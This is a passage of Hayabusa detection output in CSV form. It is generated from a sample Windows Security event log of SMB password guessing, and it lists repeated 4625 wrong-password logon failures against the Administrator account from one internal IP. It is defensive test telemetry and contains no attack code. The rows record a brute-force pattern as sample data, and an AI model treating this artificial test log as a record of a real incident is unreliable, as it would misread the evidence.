+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: 
